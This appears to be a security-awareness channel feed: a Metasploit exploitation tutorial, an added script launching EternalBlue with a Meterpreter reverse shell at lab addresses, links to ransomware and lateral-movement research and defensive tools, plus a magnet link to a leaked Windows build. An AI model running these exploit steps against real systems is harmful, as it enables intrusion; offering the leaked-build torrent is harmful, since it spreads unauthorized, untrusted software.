CISO as a Service
Founder @ DiyakoSecureBow | CISO as a Service (vCISO)
About Me
http://about.me/Alirezaghahrood

Follow Me on
🔵LinkedIn
https://www.linkedin.com/in/AlirezaGhahrood
🔴YouTube
https://www.youtube.com/AlirezaGhahrood
X
https://twitter.com/AlirezaGhahrood
Today we will have a look at Metasploit, one of the best-known exploitation frameworks. It is maintained by Rapid7 and ships with a large collection of exploits that can be used to compromise a target. Metasploit is written in Ruby and comes pre-packaged with exploits, scanners, encoders and payloads that each perform a different task. Its module database holds more than 2000 exploits covering many protocols and protocol versions, as well as Windows, Linux and other platforms.

Features:
1. It comes pre-packaged with Kali Linux and Parrot OS.
2. It is updated frequently; new exploit modules are added on a regular basis.
3. It can scan the target for open ports and for vulnerabilities. The modules that do this are called auxiliary modules.
4. When an interesting exploit is published, it is usually ported to the Metasploit Framework soon afterwards.
5. It includes Meterpreter, an in-memory payload that behaves like a shell with very advanced post-exploitation functionality.
6. It can be used for both exploitation and post-exploitation.
7. It also includes exploits for Android devices, VoIP systems and other targets.
8. It has modules for attacking various IoT devices.
9. With msfvenom we can create a malicious payload which, when executed on the target, gives us access to that machine.

Some Important Terms:

Exploit: a piece of code that triggers a vulnerability in the target and takes advantage of it.

Payload: the piece of code that runs on the victim after the exploit has succeeded. A payload can open a shell back to us or perform other malicious tasks.


How to Use?

To launch Metasploit, type the command "msfconsole" in your terminal.

>>msfconsole

#Now Metasploit loads and we are greeted with a banner.

The banner command prints a (randomly chosen) banner again on the msf console:
msf> banner

Searching the module database is much faster when the module cache lives in PostgreSQL, so start the database service before launching msfconsole (on Kali, "msfdb init" creates the database and starts it on first use):

>>service postgresql start

Step by Step:

1. search - search the module database for a keyword or a filter, such as
msf> search type:exploit - list all exploit modules
msf> search mysql - all exploit and auxiliary modules with the keyword mysql
msf> search ftp - all modules whose name or description contains ftp

Like this we can find the exploit and auxiliary modules related to our needs.

2. Once you have chosen an exploit, load it with the 'use' command, giving the full module path exactly as shown by search:
msf> use exploit/unix/ftp/vsftpd_234_backdoor
This loads the specified exploit and the prompt changes to show the module name in red, e.g. msf6 exploit(unix/ftp/vsftpd_234_backdoor) >.
That is the indication that the module was loaded successfully.

3. Now we set the options the exploit needs to run. These may include RHOSTS, LHOST, LPORT and sometimes a username, password, hash or wordlist.

LHOST = Local Host (your own IP, where the reverse connection comes back to)
RHOSTS = Remote Host(s) (the victim IP; older versions name this RHOST for single-target modules)
LPORT = the local port your handler listens on (4444 by default)

show options = shows every option of the module you just loaded, with a "Required" column that tells you which ones must be set before it will run.

Syntax to set a value: set <option> <value>

For example, with a lab address:
set LHOST 192.168.45.33
set LPORT 4444

Similarly we set all the other required options.


4. Now that the options are set, choose the payload that will run once the exploit succeeds.

To see the payloads that are compatible with the loaded exploit, type "show payloads".

Use set payload <payload name> to set the payload.

Now everything is done and we are ready to run the exploit. Before that, let's summarize:

1. Select an exploit (search, then use)
2. show options
3. set the required options
4. show payloads
5. set payload
6. RUN!

To run the exploit type "run" or "exploit" (the two are equivalent). If the target is vulnerable, the payload is delivered and executed and you get a session. Many modules also support "check", which asks the target whether it looks vulnerable without actually exploiting it; use it first where it is available.

The most common payloads are
windows/shell/reverse_tcp
windows/meterpreter/reverse_tcp

Both connect back from the Windows target to LHOST:LPORT once the exploit succeeds; the first gives a plain command shell, the second a Meterpreter session.


-Cyber Security Awareness-

Up2date 4 Defence Today,
Secure Tomorrow
@CisoasaService
1400.03.25
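As an added example (not code from the original post, nor from the Metasploit project itself), here is the six-step workflow above written as a resource script that msfconsole runs non-interactively with "msfconsole -q -r <file>", with a pre-flight check that the addresses and port are sane before anything is fired. The module, IP addresses, port and payload are assumed lab values, not hosts from the post.

```shell
#!/bin/sh
# Added example, not from the original post or the Metasploit project: build
# an msfconsole resource script (.rc) for the search -> use -> set -> payload
# -> run workflow and validate its inputs first. All addresses, the module
# and the payload below are assumptions about a lab network.

# Accept only a dotted-quad IPv4 address with each octet in 0..255. This
# catches a slip such as 182.168.45.33 (a public range) before the handler
# binds to an address you do not own or the exploit hits the wrong host.
valid_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    set -- $(printf '%s' "$1" | tr '.' ' ')
    [ $# -eq 4 ] || return 1
    for octet; do
        [ "$octet" -le 255 ] || return 1
    done
}

# Accept a TCP port in 1..65535.
valid_port() {
    case $1 in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print a resource script: each line is exactly what you would type at msf>.
# Arguments: module RHOSTS LHOST LPORT payload
# The payload is set before LHOST/LPORT so that "show options" also lists
# the payload's own options; "check" asks the module whether the target looks
# vulnerable, and "exploit -z" runs it without dropping you into the session.
build_rc() {
    rc_module=$1 rc_rhosts=$2 rc_lhost=$3 rc_lport=$4 rc_payload=$5
    valid_ipv4 "$rc_rhosts" || { echo "build_rc: bad RHOSTS '$rc_rhosts'" >&2; return 1; }
    valid_ipv4 "$rc_lhost"  || { echo "build_rc: bad LHOST '$rc_lhost'" >&2; return 1; }
    valid_port "$rc_lport"  || { echo "build_rc: bad LPORT '$rc_lport'" >&2; return 1; }
    cat <<EOF
use $rc_module
set RHOSTS $rc_rhosts
set payload $rc_payload
set LHOST $rc_lhost
set LPORT $rc_lport
show options
check
exploit -z
EOF
}

# Constructed lab values (assumed): a Windows host reachable over SMB and the
# attacker's address on the same network. Set RUN_MSF=1 to actually write the
# script and launch msfconsole with it.
if [ -n "${RUN_MSF:-}" ]; then
    build_rc exploit/windows/smb/ms17_010_eternalblue \
        192.168.56.101 192.168.56.1 4444 \
        windows/x64/meterpreter/reverse_tcp > lab.rc && msfconsole -q -r lab.rc
fi
```

The resource script is the same sequence of commands the post walks through interactively, so it doubles as a record of exactly what was run against which host, which matters when you have to write the engagement report afterwards.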
Researchers uncover "distinctive" tactics, techniques and procedures (TTPs) used by Hades ransomware operators that set them apart from the rest of the pack, attributing it to a financially motivated threat group called GOLD WINTER.
https://thehackernews.com/2021/06/experts-shed-light-on-distinctive.html


-Cyber Security Awareness-
@CisoasaService
1400.03.25
A step-by-step analysis of a new version of the DarkSide ransomware
https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/


-Cyber Security Awareness-
@CisoasaService
1400.03.26
Whitepaper (attached: win_smuggling.pdf)
"Smuggling Via Windows Services Display Name - Lateral Movement", 2021.

// This research paper explains how to take advantage of Windows services, and how to mimic their display names, to deploy malicious beacons or even Meterpreter sessions on a target.


-Cyber Security Awareness-
@CisoasaService
1400.03.26
Red Team Tactics
TChopper: conduct a lateral movement attack by leveraging unfiltered service display names to smuggle binaries, as chunks, into the target machine
https://github.com/lawrenceamer/TChopper

Threat Research
Mistune - iOS RCE vulnerabilities that have been hiding for a decade
https://blog.chichou.me/mistune

Malware analysis
1. Multi Perimeter Device Exploit Mirai Version Hunting for SonicWall, D-Link, Cisco and more
https://isc.sans.edu/forums/diary/Multi+Perimeter+Device+Exploit+Mirai+Version+Hunting+For+Sonicwall+DLink+Cisco+and+more/27528
2. Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs
https://medium.com/tenable-techblog/stealing-tokens-emails-files-and-more-in-microsoft-teams-through-malicious-tabs-a7e5ff07b138

Analytics
Attribution of the ColunmTK campaign against Air India to APT41
https://blog.group-ib.com/colunmtk_apt41


-Cyber Security Awareness-
@CisoasaService
1400.03.26
Security on the internet 😁 is meaningless, even when using …


-Cyber Security Awareness-
@CisoasaService
1400.03.26
Claroty CTD automatically identifies exact-match vulnerabilities in OT assets and creates context-rich tickets within SOAR solutions, enabling effective and efficient prioritization and remediation.
https://claroty.com/security-orchestration-automation-response/


-Cyber Security Awareness-
@CisoasaService
1400.03.26
This is a comprehensive toolkit for establishing and developing Information Sharing and Analysis Centres (ISACs). It includes activities, documents and tools, everything you need to set up and run an ISAC. The toolkit is divided into 4 phases corresponding to the development of the ISAC, and each phase contains different topics for developing the organisation in that particular phase.
The topics are classified into "New" for ISACs starting from scratch and "Established" for ISACs taking the next step in their maturity process. Topics concerning mainly new ISACs are marked with an "N" and those concerning established ISACs with an "E".
https://www.enisa.europa.eu/topics/national-cyber-security-strategies/information-sharing/isacs-toolkit/view


-Cyber Security Awareness-
@CisoasaService
1400.03.26
platform.
A threat intelligence platform for sharing, storing and correlating Indicators of Compromise of targeted attacks, threat intelligence, financial fraud information, vulnerability information or even counter-terrorism information. Discover how MISP is used today in multiple organisations, not only to store, share and collaborate on cyber security indicators and malware analysis, but also to use the IoCs and information to detect and prevent attacks, fraud or threats against ICT infrastructures, organisations or people.
https://www.misp-project.org/features.html


-Cyber Security Awareness-
@CisoasaService
1400.03.26
The 2020 Trust Report
How different industries and sectors of the economy measure up when it comes to security preparedness:
Which 9 industries are most (and least) hardened against attack, and why
Best practices for making the attackers' jobs harder
The most common types of vulnerabilities per industry
How to benchmark your industry against others using the Attacker Resistance Score (ARS) metric
Why organizations with a continuous approach to testing have up to a 23% higher ARS than those that test periodically
How industries are finding and closing vulnerabilities faster, reducing their remediation time by 73%
How to be a Guardian of Trust for your business
Download the report:
https://www.synack.com/
https://www.synack.com/trust-report/


-Cyber Security Awareness-
@CisoasaService
1400.03.26
https://www.malwarearchaeology.com/


-Cyber Security Awareness-
@CisoasaService
1400.03.26
This “Windows Sysmon Logging Cheat Sheet” is intended to help you understand where Microsoft’s FREE Sysinternals Sysmon agent can supplement and enhance your Windows Logging, NOT replace it. Sysmon can provide more information than standard default Windows logs provide. Sysmon is great to collect data you need for Incident Response, malware labs, high security situations, your own personal systems, or just improve the existing log data you are collecting with more details.
https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/5eb3687f39d69d48c403a42a/1588816000014/Windows+Sysmon+Logging+Cheat+Sheet_Jan_2020.pdf


-Cyber Security Awareness-
@CisoasaService
1400.03.26
Security Company Names
This is a business too 😁
The Cyber Security Company Names you choose will be front and center on business cards, websites, and advertisements. It will be everybody’s first impression of your business. By thoughtfully choosing a premium business name, you are giving your business the best chance at success
https://www.nameestate.com/business/cyber-security-company-names/


-Cyber Security Awareness-
@CisoasaService
1400.03.26
The profitability of security-focused startups, and their considerable financial turnover
https://angel.co/cyber-security


-Cyber Security Awareness-
@CisoasaService
1400.03.26
CSIRT TOOLS KIT
Computer Security Incident Response Teams (CSIRTs) are responsible for receiving and reviewing incident reports, and responding to them as appropriate. These services are normally performed for a defined constituency such as a corporation, institution, educational or government network, region or country, or a paid client. CSIRT services generally fall into three categories - reactive (e.g vulnerability alerts, incident handling); proactive (e.g. intrusion detection, auditing and information dissemination); and security quality management (e.g. risk analysis, disaster recovery planning, and education and training)

Incident handling information
IntelMQ is a solution for CERTs for collecting and processing security feeds, pastebins, tweets and log files using a message queuing protocol.

Security Incident Response Platform
TheHive is a scalable, open source and free Security Incident Response Platform designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner.

Network forensics
NfSen allows you to keep all the convenient advantages of the command line using nfdump directly and gives you also a graphical overview over your netflow data.

Operational intelligence
Use Elastic to search, monitor, analyze and visualize machine data.

The Open Source Security Platform
Wazuh is a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance.

Lightweight shipper for network data
Packetbeat is a lightweight network packet analyzer that sends data from your hosts and containers to Logstash or Elasticsearch.


https://csirt-kit.org/


-Cyber Security Awareness-
@CisoasaService
1400.03.26
The “SPEED” SIEM Use Case Framework
SimPle and EffectivE Detection

http://correlatedsecurity.com/content/images/2020/04/SPEED%20Use%20Case%20Framework%20v1.1.pdf


-Cyber Security Awareness-
@CisoasaService
1400.03.26
Microsoft Windows 11 Leaked
Build 21996.1

Download
magnet:?xt=urn:btih:209922c98ec03a2cbf0eebe631f9c1d577795645&dn=21996.1.210529-1541.co_release_CLIENT_CONSUMER_x64FRE_en-us.iso


-Cyber Security Awareness-
@CisoasaService
1400.03.26
New research finds that ransomware attackers are increasingly shifting from using emails as an intrusion route to purchasing access from other cybercriminal enterprises that have already infiltrated major targets.
Read: https://thehackernews.com/2021/06/ransomware-attackers-partnering-with.html


-Cyber Security Awareness-
@CisoasaService
1400.03.26
Blue Team Techniques
1. Identify the attack paths in BloodHound that break your AD tiering 😁
https://github.com/improsec/ImproHound
2. Process Ghosting - a new executable image tampering attack
https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack
Proof-of-concept code: https://github.com/hasherezade/process_ghosting


-Cyber Security Awareness-
@CisoasaService
1400.03.26
MITRE ATT&CK Matrix

Community Threats

https://github.com/scythe-io/community-threats

https://github.com/threat-punter/community-contributions

https://github.com/MISP/MISP

https://github.com/MISP/threat-actor-intelligence-server

https://github.com/MISP/misp-galaxy

https://github.com/mitre/cti

https://gist.github.com/MSAdministrator/5d152ef57e4021c4ffa242aa02e0fb37

https://github.com/Azure/Azure-Sentinel

Tools and Plugin - Free and Commercial

https://github.com/guardicore/monkey

https://github.com/center-for-threat-informed-defense/caldera_pathfinder

https://github.com/mitre/emu

https://www.scythe.io/adversary-emulation

https://github.com/redcanaryco/invoke-atomicredteam

https://github.com/uber-common/metta

https://github.com/NextronSystems/APTSimulator

https://github.com/endgameinc/RTA

https://www.encripto.no/en/downloads-2/tools/

https://github.com/TryCatchHCF/DumpsterFire

https://github.com/jymcheong/AutoTTP

https://mitre.github.io/unfetter/

https://github.com/fugawi/mate

https://github.com/praetorian-inc/purple-team-attack-automation

https://github.com/splunk/attack_range

https://github.com/Telefonica/ATTPwn

https://github.com/mvelazc0/PurpleSharp

https://github.com/timfrazier1/AdversarySimulation

https://github.com/redhuntlabs/RedHunt-OS

https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI

https://github.com/SadProcessor/SomeStuff/blob/master/PoSh_ATTCK.ps1

https://github.com/OTRF/ATTACK-Python-Client

https://github.com/JimmyAstle/Atomic-Parser

https://www.cobaltstrike.com/

https://www.immunityinc.com/services/adversary-simulation.html

https://www.safebreach.com/SafeBreach-Labs-Presenting-New-Hacking-Techniques-and-Adversary-Simulation

https://simspace.com/products-components/

https://attackiq.com/platform/#how-firedrill-works

https://www.picussecurity.com/offensive-manager.html

https://docs.microsoft.com/pt-br/microsoft-365/security/office-365-security/attack-simulator?view=o365-worldwide

https://tearsecurity.com/index.html

https://www.xmcyber.com/why-haxm/

TTPs Creator

https://mitre-attack.github.io/attack-navigator

https://exploitpack.com/

https://www.metasploit.com/

https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf


-Cyber Security Awareness-
@CisoasaService
1400.03.26
Analytics (attached: cybersecurity_insights_report.pdf)
#5G_Network_Security
AT&T Cybersecurity Insights Report:
"5G and the Journey to the Edge", 2021.


-Cyber Security Awareness-
@CisoasaService
1400.03.27